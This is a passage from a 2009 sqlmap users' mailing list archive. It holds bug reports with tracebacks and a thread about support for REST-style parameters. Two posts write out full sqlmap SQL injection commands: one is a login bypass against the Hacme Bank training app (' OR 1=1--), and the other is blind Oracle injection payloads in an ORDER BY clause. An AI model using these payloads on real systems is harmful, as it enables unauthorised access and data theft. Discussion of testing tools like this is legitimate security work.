    output = __goInference(payload, expressionReplaced, charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 58, in
__goInference
    count, value = bisection(payload, expression, length, charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/techniques/blind/inference.py", line
81, in bisection
    progress = ProgressBar(maxValue=length)
  File "/home/sbit/Workspace/sqlmap/lib/core/progress.py", line 39, in
__init__
    self.__max = int(maxValue)
ValueError: invalid literal for int() with base 10: ''

[sqlmap-users] sqlmap and Hacme Bank

[Richard J. <wp...@gm...>]

Hi all,

I've been playing with sqlmap against Foundstone's Hacme Bank and have been
making some progress.

Here is the command I've come up with:

./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx"
--method=POST -p "txtUserName"
--cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l;
CookieLoginAttempts=5; Admin=false"
--data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit"
-v 5 --prefix="'" --postfix=" OR 1=1--" --batch

I can confirm that this command is able to gain access to the HacmeBank site
with this crafted string:  jv' AND 1322=1322  OR 1=1-- (Unicode decoded, of
course).  Some other crafted strings from sqlmap are successful as well.

BUT, sqlmap doesn't seem to detect that it is successful in gaining access.
I think the problem exists in the --regexp string.....as in I can't find a
regexp that works....

>From the sqlmap docs, --regexp lets the user "provide a string which is *
always* present on the not injected page *and* on all True injected query
pages, but that it is *not* on the False ones".  The problem I think am I
running into is finding a string that is present on the not injected page,
but no on the false pages.

The strings that I have been trying to match are:
Not Injected Page:     Message"></span>
True Injected Page:    Message">Line 1: Incorrect syntax near 'asdf'.</span>
False Injected Page:  Message">Invalid Login</span>

My question is how is the "not injected" page detected?  When watching the
output on level 5 verbosity, I see this request.  I assume this is the
request to determine the "Not Injected" page?

[11:42:28] [INFO] testing if the provided regular expression matches within
the target URL page content
[11:42:30] [TRAFFIC OUT] HTTP request:
POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
Content-length: 105
Accept-language: en-us,en;q=0.5
Connection: Keep-Alive
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.200.11:80 <http://192.168.200.11/>
Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5;
Admin=false
Content-type: application/x-www-form-urlencoded
__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit

This request sends in the POST data that I provided at the command line.
This data causes an "Invalid Login" from the login page, which is exactly
what happens when a False injected query occurs as well.  In fact, the HTML
that comes back from this "Not Injected" request is identical to the HTML
that comes back from a False injected page.

So, in this situation, I feel that sqlmap isn't requesting the "Not
Injected" page correctly.  In my mind, that would involve a GET request,
with no login data, to login.aspx, not a POST to that page.  The GET should
return a page that doesn't have the "Invalid Login" text that gets returned
to a POST with invalid credentials.

So, can I get sqlmap to detect the "Not Injected" page with a simple GET
request, but then perform the sql injection using POST requests?  Or is
there something else that needs done?  I tried changing --method to GET, as
well as removing --method, but the GET that is sent for the "Not Injected"
page still contains the POST data, which still results in "Invalid Login".

Or I am confused on how this should work?

Thanks!

Richard

[sqlmap-users] sqlmap error

[sql p. <sql...@go...>]

Hi guys,

I had the following error when running sqlmap. The error occured in version
0.6.4 and 0.7rc1. Note that I use prefix and postfix because the injection
can only be done in an order by statement. In order by you cannot directly
append "AND 1=1". The setup for sql injection works and was verified.

Best Regards,

Jan

./sqlmap.py -u "
http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1"
-p FLD_listInstancesOrderBy --string=rowHighSmall --proxy=
http://127.0.0.1:8080/--cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg"
--delay=1 --prefix="%2b(select%20case%20when%201=1"
--postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select
'bla' from dual"
/home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:27: DeprecationWarning: the
md5 module is deprecated; use hashlib instead
  import md5
/home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:28: DeprecationWarning: the
sha module is deprecated; use the hashlib module instead
  import sha

    sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
                      and Daniele Bellucci <dan...@gm...>

[*] starting at: 14:53:19

[14:53:19] [WARNING] the testable parameter 'FLD_listInstancesOrderBy' you
provided is not into the Cookie
[14:53:19] [INFO] testing connection to the target url
[14:53:20] [INFO] testing if the provided string is within the target URL
page content
[14:53:22] [INPUT] you provided an HTTP Cookie header value. The target url
provided its own Cookie within the HTTP Set-Cookie header. Do you want to
continue using the HTTP Cookie values that you provided? [Y/n] Y
[14:53:26] [INFO] testing if GET parameter 'FLD_listInstancesOrderBy' is
dynamic
[14:53:28] [INFO] confirming that GET parameter 'FLD_listInstancesOrderBy'
is dynamic
[14:53:31] [INFO] GET parameter 'FLD_listInstancesOrderBy' is dynamic
[14:53:31] [INFO] testing sql injection on GET parameter
'FLD_listInstancesOrderBy' with 0 parenthesis
[14:53:31] [INFO] testing custom injection on GET parameter
'FLD_listInstancesOrderBy'
[14:53:35] [INFO] confirming custom injection on GET parameter
'FLD_listInstancesOrderBy'
[14:53:37] [INFO] GET parameter 'FLD_listInstancesOrderBy' is custom
injectable
[14:53:37] [INFO] testing for parenthesis on injectable parameter
[14:53:37] [INFO] testing MySQL
[14:53:38] [WARNING] the back-end DMBS is not MySQL
[14:53:38] [INFO] testing Oracle
[14:53:41] [INFO] confirming Oracle
[14:53:43] [INFO] the back-end DBMS is Oracle

web application technology: Apache, Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle

[14:53:43] [INFO] fetching SQL SELECT statement query output: 'select 'bla'
from dual'
[14:53:43] [INPUT] can the SQL query provided return multiple entries? [Y/n]
n
[14:53:47] [INFO] query: SELECT NVL(CAST(CHR(98)||CHR(108)||CHR(97) AS
VARCHAR(4000)), CHR(32)) FROM dual
[14:53:47] [INFO] retrieved: [14:53:47] [ERROR] unhandled exception in
sqlmap/0.6.4, please copy the command line and the following text and send
by e-mail to sql...@li.... The developers will fix it
as soon as possible:
sqlmap version: 0.6.4
Python version: 2.6.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 81, in main
    start()
  File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/controller.py", line
255, in start
    action()
  File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/action.py", line 123, in
action
    dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
  File "/home/jan/Tools/sqlmap-0.6.4/plugins/generic/enumeration.py", line
1078, in sqlQuery
    output = inject.getValue(query, fromUser=True)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 364, in
getValue
    value = __goInferenceProxy(expression, fromUser, expected)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 297, in
__goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields,
expressionFieldsList, payload, expected)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 100, in
__goInferenceFields
    output = __goInference(payload, expressionReplaced)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 60, in
__goInference
    count, value = bisection(payload, expression, length=length)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py",
line 231, in bisection
    val = getChar(index)
  File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py",
line 101, in getChar
    forgedPayload = payload % (expressionUnescaped, idx, limit)
ValueError: unsupported format character 'b' (0x62) at index 104

[*] shutting down at: 14:53:47

Re: [sqlmap-users] REST style parameters?

[Daniele B. <dan...@gm...>]

There could be some potential features but, can you introduce it a little more ?
What are main differences with other sql inj tools?
What is the 'OXCP' protocol and why do you need it..

Tnx


On Sat, Jun 13, 2009 at 10:11 AM, Christian Eric
EDJENGUELE<c_e...@ya...> wrote:
>
> Hi steve,
> if you're thinking about REST for webservices assessment, then the answer is no.
> you should consider another tool like OpenSQLi-NG (not available for public yet, I'll do so very soon) http://opensqling.sourceforge.net/ ,  it support webservices assessment with both a  messaging layer ( such as SOAP, or session tracking via HTTP cookies) and REST see the following for available features: http://opensqling.sourceforge.net/?page_id=8#features
>
>
> Best
> ---
> Christian Eric Edjenguele
> IT Security Software Developer & Researcher / Business Developer / Enterprise Software Architect
> mobile (IT): +39 3408580513
>
>
>
> ----- Messaggio originale -----
>> Da: Steve Pinkham <ste...@gm...>
>> A: sql...@li...
>> Inviato: Venerdì 12 giugno 2009, 23:33:39
>> Oggetto: [sqlmap-users] REST style parameters?
>>
>> Does SQLmap have any way to support REST style URL parameters, such as:
>> "http://www.example.com/parm1/parm2"  ?
>> I couldn't find any information on this in the documentation.
>> Thanks
>> --
>>   | Steven E. Pinkham                      |
>>   | GPG public key ID CD31CAFB             |
>>
>>
>> ------------------------------------------------------------------------------
>> Crystal Reports - New Free Runtime and 30 Day Trial
>> Check out the new simplified licensing option that enables unlimited
>> royalty-free distribution of the report engine for externally facing
>> server and web deployment.
>> http://p.sf.net/sfu/businessobjects
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>
> ------------------------------------------------------------------------------
> Crystal Reports - New Free Runtime and 30 Day Trial
> Check out the new simplified licensing option that enables unlimited
> royalty-free distribution of the report engine for externally facing
> server and web deployment.
> http://p.sf.net/sfu/businessobjects
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] REST style parameters?

[Daniele B. <dan...@gm...>]

Hi, i'm the original author of sqlmap even if Bernardo replaced me
years ago. I would like to know where and what is the problem..despite
of which tools is more appropriate, how doc has been written, who say
what and so on

2009/6/14, Steve Pinkham <ste...@gm...>:
> Bernardo Damele A. G. wrote:
>> Good question! Maybe the answer is SPAM? Maybe 'cause we *desperately*
>> need the nth useless/limited/unmaintained/crappy SQL injection tool?
>> I've counted over 30 open source tools so far, tested about 20, guess
>> how many do what they claim.. Very few, and guess how many do exploit
>> deeply the flaw and are highly customizable and flexible.. Even less.
>>
>> On Sat, Jun 13, 2009 at 19:29, <ja...@ev...> wrote:
>>> Why would you suggest he use another tool which has no public releases?
>>> [...]
>>
>
> Yeah, that's why I'm on the SQLmap list, because it Just Works for most
> things I want to use it for.  Not to say I wouldn't welcome another good
> tool, but I've used more then my share of partially to non-functioning
> often malware infested SQL tools to want to continue to test more.
>
> Obviously writing a generic tool that covers the necessary functionality
> is much harder then most people realize then they get going.
> --
>   | Steven E. Pinkham                      |
>   | GPG public key ID CD31CAFB             |
>
> ------------------------------------------------------------------------------
> Crystal Reports - New Free Runtime and 30 Day Trial
> Check out the new simplified licensing option that enables unlimited
> royalty-free distribution of the report engine for externally facing
> server and web deployment.
> http://p.sf.net/sfu/businessobjects
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] REST style parameters?

[Steve P. <ste...@gm...>]

Bernardo Damele A. G. wrote:
> Good question! Maybe the answer is SPAM? Maybe 'cause we *desperately*
> need the nth useless/limited/unmaintained/crappy SQL injection tool?
> I've counted over 30 open source tools so far, tested about 20, guess
> how many do what they claim.. Very few, and guess how many do exploit
> deeply the flaw and are highly customizable and flexible.. Even less.
> 
> On Sat, Jun 13, 2009 at 19:29, <ja...@ev...> wrote:
>> Why would you suggest he use another tool which has no public releases?
>> [...]
> 

Yeah, that's why I'm on the SQLmap list, because it Just Works for most 
things I want to use it for.  Not to say I wouldn't welcome another good 
tool, but I've used more then my share of partially to non-functioning 
often malware infested SQL tools to want to continue to test more.

Obviously writing a generic tool that covers the necessary functionality 
is much harder then most people realize then they get going.
-- 
  | Steven E. Pinkham                      |
  | GPG public key ID CD31CAFB             |

Re: [sqlmap-users] REST style parameters?

[Bernardo D. A. G. <ber...@gm...>]

Good question! Maybe the answer is SPAM? Maybe 'cause we *desperately*
need the nth useless/limited/unmaintained/crappy SQL injection tool?
I've counted over 30 open source tools so far, tested about 20, guess
how many do what they claim.. Very few, and guess how many do exploit
deeply the flaw and are highly customizable and flexible.. Even less.

On Sat, Jun 13, 2009 at 19:29, <ja...@ev...> wrote:
> Why would you suggest he use another tool which has no public releases?
> [...]

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] REST style parameters?

[<ja...@ev...>]

Why would you suggest he use another tool which has no public releases?

On Sat, 13 Jun 2009, Steve Pinkham wrote:

> Bernardo Damele A. G. wrote:
>> Hi Steve,
>>
>> On Fri, Jun 12, 2009 at 22:33, Steve Pinkham<ste...@gm...> wrote:
>>> Does SQLmap have any way to support REST style URL parameters, such as:
>>> "http://www.example.com/parm1/parm2"  ?
>>> I couldn't find any information on this in the documentation.
>>
>> As I said several times already on this mailing list, this will come
>> in the long run. sqlmap does not support it yet.
>>
>> Cheers,
>
> Sorry, I did search the mailing list archive on sourceforge for REST,
> parameter(s), and other queries, and nothing related came up. It does
> now ;-)
> I also googled, searched the documentation and hunted for a bug tracker
> first.  I apologize if there's some other FM I should have R'd, but I
> did attempt.
>
> --
>  | Steven E. Pinkham                      |
>  | GPG public key ID CD31CAFB             |
>
> ------------------------------------------------------------------------------
> Crystal Reports - New Free Runtime and 30 Day Trial
> Check out the new simplified licensing option that enables unlimited
> royalty-free distribution of the report engine for externally facing
> server and web deployment.
> http://p.sf.net/sfu/businessobjects
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] REST style parameters?

[Steve P. <ste...@gm...>]

Bernardo Damele A. G. wrote:
> Hi Steve,
> 
> On Fri, Jun 12, 2009 at 22:33, Steve Pinkham<ste...@gm...> wrote:
>> Does SQLmap have any way to support REST style URL parameters, such as:
>> "http://www.example.com/parm1/parm2"  ?
>> I couldn't find any information on this in the documentation.
> 
> As I said several times already on this mailing list, this will come
> in the long run. sqlmap does not support it yet.
> 
> Cheers,

Sorry, I did search the mailing list archive on sourceforge for REST, 
parameter(s), and other queries, and nothing related came up. It does 
now ;-)
I also googled, searched the documentation and hunted for a bug tracker 
first.  I apologize if there's some other FM I should have R'd, but I 
did attempt.

-- 
  | Steven E. Pinkham                      |
  | GPG public key ID CD31CAFB             |

Re: [sqlmap-users] REST style parameters?

[Christian E. E. <c_e...@ya...>]

Hi steve,
if you're thinking about REST for webservices assessment, then the answer is no.
you should consider another tool like OpenSQLi-NG (not available for public yet, I'll do so very soon) http://opensqling.sourceforge.net/ ,  it support webservices assessment with both a  messaging layer ( such as SOAP, or session tracking via HTTP cookies) and REST see the following for available features: http://opensqling.sourceforge.net/?page_id=8#features 

 
Best
---
Christian Eric Edjenguele
IT Security Software Developer & Researcher / Business Developer / Enterprise Software Architect 
mobile (IT): +39 3408580513



----- Messaggio originale -----
> Da: Steve Pinkham <ste...@gm...>
> A: sql...@li...
> Inviato: Venerdì 12 giugno 2009, 23:33:39
> Oggetto: [sqlmap-users] REST style parameters?
> 
> Does SQLmap have any way to support REST style URL parameters, such as:
> "http://www.example.com/parm1/parm2"  ?
> I couldn't find any information on this in the documentation.
> Thanks
> -- 
>   | Steven E. Pinkham                      |
>   | GPG public key ID CD31CAFB             |
> 
> 
> ------------------------------------------------------------------------------
> Crystal Reports - New Free Runtime and 30 Day Trial
> Check out the new simplified licensing option that enables unlimited
> royalty-free distribution of the report engine for externally facing 
> server and web deployment.
> http://p.sf.net/sfu/businessobjects
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



      

Re: [sqlmap-users] REST style parameters?

[Bernardo D. A. G. <ber...@gm...>]

Hi Steve,

On Fri, Jun 12, 2009 at 22:33, Steve Pinkham<ste...@gm...> wrote:
> Does SQLmap have any way to support REST style URL parameters, such as:
> "http://www.example.com/parm1/parm2"  ?
> I couldn't find any information on this in the documentation.

As I said several times already on this mailing list, this will come
in the long run. sqlmap does not support it yet.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

[sqlmap-users] REST style parameters?

[Steve P. <ste...@gm...>]

Does SQLmap have any way to support REST style URL parameters, such as:
"http://www.example.com/parm1/parm2"  ?
I couldn't find any information on this in the documentation.
Thanks
-- 
  | Steven E. Pinkham                      |
  | GPG public key ID CD31CAFB             |